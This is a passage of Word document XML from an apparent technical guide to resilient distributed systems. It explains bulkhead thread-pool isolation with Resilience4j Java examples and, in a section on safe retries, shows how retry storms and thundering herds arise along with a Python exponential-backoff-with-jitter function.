    <w:p w14:paraId="17CB35FC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Inventory service becomes slow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E2B4A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Threads blocked waiting for inventory: 90 of 100 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393935AC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Payment and user service calls: 10 threads left → overloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CCDA81" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      All services degrade because of inventory failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E76A97" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F119FE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  With bulkhead:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437EF7C5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Separate thread pool per downstream:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F419E1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Payment pool: 30 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4791BA5C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Inventory pool: 30 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA72B5F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      User pool: 30 threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7437AE14" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171E3BEA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Inventory service becomes slow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DED4337" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Inventory pool: all 30 threads blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12389290" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      Payment pool: unaffected (30 threads available)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5B6246" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      User pool: unaffected (30 threads available)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD5E79B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      → Payment and user service continue normally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C22E66C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EE9128" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Resilience4j bulkhead (Java):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38436FCB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  // Semaphore-based bulkhead (concurrent requests limit)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E24846F" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  BulkheadConfig config = BulkheadConfig.custom()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F95DF5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    .maxConcurrentCalls(30)      // max concurrent calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E964C5B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .maxWaitDuration(100ms)       // wait for permit before rejecting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FC1C6B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    .build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB1B26" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Bulkhead bulkhead = Bulkhead.of("inventory-service", config);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00AD5853" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152221A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  // Thread pool bulkhead (separate thread pool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5970B6D0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  ThreadPoolBulkheadConfig tpConfig = ThreadPoolBulkheadConfig.custom()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54223E0A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    .maxThreadPoolSize(30)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B2DA27" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    .coreThreadPoolSize(15)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2867DFD0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    .queueCapacity(100)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3401F9A4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    .keepAliveDuration(20ms)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD2E291" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    .build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174AB449" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  ThreadPoolBulkhead tpBulkhead = ThreadPoolBulkhead.of("inventory-service", tpConfig);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F325AB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F8E019" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  // Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B9E3CB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  CompletableFuture&lt;Response&gt; future = tpBulkhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2164ABE1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    .executeSupplier(() -&gt; inventoryService.checkStock(productId));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E229501" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:pict w14:anchorId="120E02C1">
          <v:rect id="_x0000_i6443" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBB1F07" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Retry Strategies — Safe Retries Without Amplifying Failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48A23D50" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exponential Backoff with Jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131703F3" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why naive retry is dangerous:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FF4B9A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01045A58" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Synchronized retry storm:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0A9E23" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  1,000 clients send requests to server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75617915" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Server fails → all clients see error at time T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376F1433" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  All clients retry at T + 1 second (fixed retry interval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B66CA9C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Server recovers at T + 0.5 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71779397" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  T + 1.0: 1,000 requests arrive simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13660EA8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Server overloaded again → all fail again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4CEDD1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  T + 2.0: 1,000 requests arrive simultaneously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4C39E7" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565617A0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Retry amplifies the load spike that caused the failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD5449E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  → System never recovers (each recovery attempt causes re-failure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B64606" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A95236" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Thundering herd problem:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C3A92D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Cache expires or server restarts → temporary unavailability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013DE8BC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  All clients retry simultaneously → overload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F162F6A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  System oscillates between overloaded and recovering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5125DB69" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345F31A6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Solution: exponential backoff + jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4300735D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  Each client retries with independently random delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03568A42" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">  → Requests spread over time → server recovers without overload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A02C6CB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The correct retry implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479111CB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23646D7E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC93EF5" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69812214" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518"/>
    <w:p w14:paraId="1A055ABF" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>def retry_with_backoff(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A770011" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    func,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224A6C3C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    max_retries: int = 5,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C270E65" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    base_delay_ms: float = 100,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215FEEF1" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    max_delay_ms: float = 30_000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785E5A81" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    backoff_factor: float = 2.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C30797" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    jitter: str = "full",  # "full", "equal", "decorrelated", "none"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13070818" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    retryable_exceptions: tuple = (TransientError, TimeoutError)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCE4B33" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827AC21" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25036E91" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Retry with exponential backoff and jitter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB57ED4" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CF4FCD" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    Jitter strategies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C353B92" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      full: delay = random(0, base * 2^attempt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513B308C" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        - Maximum spread, good default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C242E6" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458D5BCE" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      equal: delay = base * 2^attempt / 2 + random(0, base * 2^attempt / 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B07B70A" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        - Half deterministic, half random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5205E63B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        - Prevents very short delays at low attempt counts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475E38FB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BCBCF8" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      decorrelated: delay = random(base, previous_delay * 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AA2A05" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        - Each delay independent of attempt number</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361AD6F0" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        - Good when attempt number doesn't map well to wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB475DA" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C19FCAB" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">      none: delay = base * 2^attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BFF091B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        - NO jitter (dangerous in distributed systems)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020D3A9D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        - All clients retry at same time → thundering herd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508E386E" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B17B1EC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    previous_delay_ms = base_delay_ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57119309" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5842941D" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">    for attempt in range(max_retries + 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D390031" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC9219B" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            return func()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651B0DEC" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">        except retryable_exceptions as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F21609" w14:textId="77777777" w:rsidR="00476518" w:rsidRPr="00476518" w:rsidRDefault="00476518" w:rsidP="00476518">
      <w:r w:rsidRPr="00476518">
        <w:t xml:space="preserve">            if attempt == max_retries:</w:t>
      </w:r>
    </w:p>
